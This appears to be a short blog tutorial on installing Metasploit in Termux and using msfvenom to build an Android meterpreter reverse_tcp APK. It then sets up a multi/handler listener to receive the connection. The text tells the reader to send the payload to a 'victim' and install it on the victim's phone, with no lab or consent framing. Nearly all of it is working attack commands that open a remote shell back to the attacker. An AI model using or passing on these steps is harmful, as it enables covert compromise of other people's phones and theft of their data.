Metasploit Tool Installation and Usage

Full guide for installation and usage of metasploit in termux.

Metasploit

METASPLOIT INSTALLATION AND RUN COMMANDS

What is payload ?
A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload. 

Commands :

apt-get update

apt-get updgrade

$ pkg install unstable-repo (Or) apt install unstable-repo

$ pkg install metasploit (Or) apt install metasploit

After installation 

msfconsole 

Wait 2min until open 

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk

Want IP go to google search what is my IPv4 address 1st link open copy your ip

Payload is on internal storage send payload to victim install it on victim mobile

pkg install postgresql

pg_ctl -D $PREFIX/var/lib/postgresql start

msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST (your listening ip address)

set LPORT (your listening port)

exploit

Post a Comment

0 Comments